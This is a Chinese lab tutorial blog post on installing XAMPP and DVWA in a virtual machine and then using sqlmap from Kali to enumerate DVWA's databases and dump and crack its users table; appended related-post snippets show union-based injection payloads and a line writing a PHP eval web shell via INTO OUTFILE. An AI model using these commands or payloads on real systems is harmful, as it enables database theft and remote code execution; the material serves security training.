对DVWA进行SQL注入

最新推荐文章于 2025-07-07 10:47:07 发布
原创 最新推荐文章于 2025-07-07 10:47:07 发布 · 4.8k 阅读 · 22 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#注入 #dvwa #dvwa的注入 #kali对dvwa的SQL注入

我用的是在VMware下的虚拟机,在这就不说如何安装kali和win7了,各位自己去网上找一下大神们的教程,就很容易安装了。(统一说明:为了安全性等各方面考虑,下载软件最好到软件的官网上去下载)我用的系统如下:
kali:192.168.0.183 进行SQL注入
win7:192.168.0.184 安装xampp,搭建dvwa环境

dvwa使用PHP写的,所以首先需要搭建web运行环境,我这里使用的是xampp,本人用的方便快捷,比较顺手,也比较熟悉。

1、安装xampp

下载对应版本的xampp,上xampp官网:https://www.apachefriends.org/download.html ,安装过程没啥好说的,点击“下一步”直到安装完成,我是装在C盘根目录(因为是虚拟机win7)

打开之后在出现的“XAMPP控制面板窗口”中,点击“Apache”同行的“Config按钮”,然后选择“Apache (httpd.conf)”,打开http的配置文件。
在这里插入图片描述

在打开的“httpd.conf文件”中,找到“Listen”后,将其端口改为“8000”(默认的80端口并不安全,8005,8009,8080端口会被Tomcat占用),保存修改后,关闭该文件。
在这里插入图片描述

返回“XAMPP控制面板窗口”中,继续点击“MySQL”右侧的“Config按钮”,然后选择弹出菜单中的“my.ini”,打开MySQL的配置文件。
在这里插入图片描述

在打开的“my.ini文件”中,找到“[client]”后,可以设置客户端连接MySQL的密码和端口。设置并保存后,可以直接关闭该文件。
在这里插入图片描述

点击“Apache”同行的“admin”,如果见到XAMPP的欢迎页,表示Apache工作正常。
在这里插入图片描述

2、安装dvwa

到dvwa官网上:http://www.dvwa.co.uk/ 下载最新的压缩包
在这里插入图片描述

下载后,将其解压到xampp安装路径下的htdocs目录下
在这里插入图片描述

然后进入DVWA,打开config目录里的config.inc.php ,修改数据库的账号密码(该密码与你前面xampp内MySQL数据库的账号密码一致)
在这里插入图片描述

打开浏览器,输入http://127.0.0.1/DVWA/setup.php ,点击下面的按钮,就会自动创建数据库
在这里插入图片描述

接着会跳转到DVWA的登录页面默认用户名:admin ,默认密码:password 成功登录在这里插入图片描述在这里插入图片描述
到这里,测试环境dvwa算是搭建好了。

3、kali下的SQL注入

(1)在kali下打开浏览器,输入http://192.168.0.184(win7的IP地址)/DVWA/login.php 输入账号密码登录进去,然后点击左侧的“DVWA Security”,选择“low”级别,点击选定。

(2)打开火狐浏览器,添加附件组件tamper data,安装后打开,然后登录dvwa,获取cookie值
在这里插入图片描述
在这里插入图片描述

(3)获取要测试的url,点击SQL Injection菜单,在输入框输入1,点击submit,获取待测试的url:http://192.168.169.129/dvwa/vulnerabilities/sqli/id=1&Submit=Submit#
在这里插入图片描述

(4)使用sqlmap测试该url是否存在sql注入漏洞,返回MySQL数据库的版本信息
root@kali:~# sqlmap -u “http://192.168.169.129/dvwa/vulnerabilities/sqli/id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=n4tkop4ku1lbmsa4o6326vsv90”
在这里插入图片描述
在这里插入图片描述

(5)探测MYSQL的数据库名称
root@kali:~# sqlmap -u “http://192.168.169.129/dvwa/vulnerabilities/sqli/id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=pu63p86c54jurn59bms72637h5” --dbs
在这里插入图片描述
(6)查询dvwa数据库存在的表名
root@kali:~# sqlmap -u “http://192.168.169.129/dvwa/vulnerabilities/sqli/id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=pu63p86c54jurn59bms72637h5” -D dvwa --tables
在这里插入图片描述
(7)查询users表中的字段列表
root@kali:~# sqlmap -u “http://192.168.169.129/dvwa/vulnerabilities/sqli/id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=pu63p86c54jurn59bms72637h5” -D dvwa --tables -T users --columns
在这里插入图片描述
(8)导出users表,会列出所有的列的用户名和密码,sqlmap会提出是否破解密码,按回车确定
root@kali:~# sqlmap -u “http://192.168.169.129/dvwa/vulnerabilities/sqli/id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=pu63p86c54jurn59bms72637h5” -D dvwa --tables -T users --columns --dump
在这里插入图片描述
这时就可以利用admin账户登录做任何事了。

DVWA渗透环境下SQL注入
skyattractive的博客
07-29 544
DVWA渗透环境下SQL注入 dvwa是一个randomstorm的开源项目,用来供给新手学习渗透测试的一个环境,里面共有十个模块: Brute Force(暴力(破解)) Command Injection(命令行注入) CSRF(跨站请求伪造) File Inclusion(文件包含) File Upload(文件上传) Insecure CAPTCHA (不安全的验证码) SQL Injection(SQL注入SQL Injection(Blind)(SQL盲注) XSS(Reflected
sqlmap对dvwa进行sql注入
weixin_52971422的博客
04-01 4894
渗透环境:dvwa 攻击机:kali 注入点 测试 在kali使用sqlmap,添加cooki来注入 sqlmap -u "http://192.168.17.152/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=24d706127dc1260818eadf1641c43547" --dbs 成功 继续查询数据库的表 sqlmap -u "http://1
DVWASQL Injection
谢公子的博客
08-05 7300
SQL Injection SQL Injection,即SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。近期很火的大使馆接连被黑事件,据说黑客依靠的就是常见的SQL注入漏洞。 手工注入思路 自动化的注入神器sqlmap...
DVWA靶场通关笔记-SQL注入(SQL Injection High级别)
最新发布
mooyuan的网络安全博客
07-07 836
DVWA(Damn Vulnerable Web Application)中的 SQL Injection 关卡是用于练习和演示 SQL 注入攻击的不同场景,不同安全等级存在不同的脆弱点和绕过方法,本小节对高级High级别的关卡进行渗透实战。
DVWASQL 注入
Hacker_feng的博客
10-02 772
1' or 1=2 union select 1, group_concat(table_name) from information_schema.tables where table_schema=database()# // 查询当前数据库dvwa 中的表。这里也可以通过输入union select 1,2,3…输入:1' union select 1,2#输入: 1' or '1'='1。
sql注入dvwa
m0_58589875的博客
03-08 534
1' union(联合查询) selcet 1,2'(测试数据库有几个字段)middle:mysqli_real_escape_string()对输入的特殊字符进行转义。相关一点点SQL语句。
DVWASQL注入
RexHa的博客
09-27 2356
DVWA靶场sql注入三个级别通关
利用sqlmap对dvwa进行sql注入
ZJLE的博客
08-08 5298
sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。采用五种独特的SQL注入技术,分别是: 1)基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2)基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时
渗透测试实验_在kali Linux 2021环境下使用sqlmap对DVWA进行sql注入
weixin_47133613的博客
04-06 8894
文章目录1. sqlmap是什么2. 启动kali Linux ,进行sqlmap更新3. 启动phpStudy,启动火狐浏览器代理,运行BurpSuite4. 如果sqlmap出现404或者返回test的报错,可以尝试重置DVWA,重启phpStudy5. 选择安全等级“Low”,点击“SQL Injection”,通过报文中的url和cookie构造sqlmap命令获取信息5.1 获取数据库5.2 获取dvwa数据库中的表名5.3 获取dvwa库中users表中的列名5.4 获取dvwa库中users表
DVWASQL注入详解(包含知识点)
10-20
在进行SQL注入攻击时,攻击者可能会利用应用程序的漏洞,比如未对用户输入进行适当的过滤或者使用了不安全的数据库操作函数等,向数据库发送恶意SQL语句。这些语句可能会被用来获取敏感信息、篡改数据库数据、执行...
使用Sqlmap对dvwa进行sql注入测试(初级阶段)
fanxindong0620的博客
11-07 3538
0.测试准备 1)打开Kali虚拟机终端; 2)打开靶机OWASP,并通过浏览器,输入IP地址进入dvwa的主页,然后选择SQL injection进入SQL注入的测试页面 1.获取DVWA的url和cookie 在输入框中输入1,显示有内容,此时利用此URL进行SQL注入。 输入document.cookie获取页面的cookie。去除remem_token字段的内容,用于下文的sql注入终...
DVWA下的SQL注入
07-25
SQL
dvwasql注入
BAIXUAN9527的博客
03-27 605
SQL i 攻击者在web表单或者页面请求的查询字符串中通过查询的字符串恶意的注入SQl命令,从而使数据库执行恶意的SQl语句 1验证web存在SQL漏洞 2寻找注入点 2.1web页面某个表单的输入框里 2.2web页面的URL查询(带参数的URl) 3构造攻击的SQL语句 4通过注入点提交构造的攻击语句,构造的SQL在数据库执行 5通过web页面返回数据,提取分析我们想要的数据信息 注入点类...
DVWA——SQL注入
m0_74426634的博客
04-07 1554
日前,国内最大的程序员社区优快云网站的用户数据库被黑客公开发布,600万用户的登录名及密码被公开泄露,随后又有多家网站的用户密码被流传于网络,连日来引发众多网民对自己账号、密码等互联网信息被盗取的普遍担忧。网络安全成为了现在互联网的焦点,这也恰恰触动了每一位用户的神经,由于设计的漏洞导致了不可收拾的恶果,验证了一句话“出来混的,迟早是要还的”,所以介绍一些常用的攻击技术和防范策略。SQL Injection也许很多人都知道或者使用过,如果没有了解或完全没有听过也没有关系,因为接下来我们将介绍SQL Inj
SQL注入DVWA平台测试mysql注入
tianshui121的专栏
08-18 1747
今天主要针对mysql常用注入语句进行测试。 测试环境与工具: 测试平台:DVWA,下载地址:http://www.2cto.com/soft/201303/38043.html,也可下载metaspolit-table2虚拟机,里面已经部署好了dvwa.。 渗透工具burpsuite-1.4.07:下载地址:http://www.2cto.com/soft/201211/35515.h
DVWA-SQL注入
acdcccc的博客
08-26 391
分享DVWA靶场的SQL注入过程
使用DVWA进行SQL注入
04-03
### DVWA SQL Injection Tutorial #### 实验环境搭建 为了测试和学习SQL注入漏洞,通常会使用DVWA(Damn Vulnerable Web Application)。这是一个专门设计用于教育目的的应用程序,其中包含了多种安全漏洞供用户实践。在实验之前,请确保已安装并配置好DVWA运行所需的Web服务器、PHP以及MySQL数据库[^1]。 #### 基本原理 SQL注入是一种常见的网络安全威胁形式,在这种攻击中,攻击者能够向应用程序提交恶意的SQL代码片段,这些代码会被嵌入到正常的SQL查询语句之中被执行。如果目标应用未能正确验证或转义用户的输入,则可能导致敏感数据泄露或其他严重后果[^3]。 #### 利用过程分析 当访问`http://127.0.0.1/dvwa/vulnerabilities/sqli/`页面时,默认情况下它会显示一条记录的信息。此功能背后存在安全隐患——即直接将未经处理过的外部变量值拼接到动态构建出来的SQL指令里去检索对应的数据项: ```sql SELECT first_name, last_name FROM users WHERE user_id = '$id'; ``` 由于上述实现缺乏必要的防护措施比如白名单校验或者预编译占位符技术等,所以很容易受到攻击者的操控。例如尝试提交如下payload作为参数之一的部分内容来观察返回结果的变化情况: ```plaintext 1' OR '1'='1 -- - ``` 这实际上修改了原始查询逻辑成为始终成立条件下的全表扫描操作[^2]: ```sql SELECT first_name, last_name FROM users WHERE user_id = '' OR '1'='1'-- '; ``` #### 高级技巧展示 除了简单的布尔型盲注之外,还可以借助联合查询(UNION SELECT)的方式进一步获取更多有用情报甚至控制权。下面是一个实例说明如何创建一个新的PHP文件于远程主机上以便后续反序列化触发任意命令执行等功能扩展可能性[^4]: ```bash 1' UNION ALL SELECT NULL,'<?php @eval($_POST["cmd"]);?>' INTO OUTFILE 'D:/web\PhpStudy20180211\PHPTutorial\WWW\x.php';# ``` 请注意实际部署环境中路径可能有所不同需自行调整适配具体场景需求。 #### 安全建议 为了避免此类风险的发生,开发人员应当遵循最佳编码规范如采用ORM框架自动映射关系模型减少手动编写复杂SQL的机会;同时启用严格的输入验证机制防止非法字符混入最终到达数据库层面前就被拦截下来。 ---
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值